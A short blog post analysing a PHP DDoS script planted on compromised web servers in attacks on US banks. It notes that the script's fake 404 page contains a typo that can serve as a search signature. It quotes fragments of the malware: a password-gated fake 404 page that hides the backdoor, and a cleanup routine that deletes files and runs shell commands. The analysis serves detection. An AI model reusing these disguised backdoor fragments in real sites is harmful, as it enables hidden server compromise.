DDoS PHP-Script

Just recently the BSI warned about an ongoing attack to US Banks.
The php-script involved showed a “404” Error when called without any
arguments.

A closer looks shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in google or wherever..
and bingo: some other victom already posted the source code
of the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}

 

 

Tags: ,

One Response to “DDoS PHP-Script”

  1. SimpleMn says:

    SimpleMn

    DDoS PHP-Script « spamversand

Leave a Reply

You must be logged in to post a comment.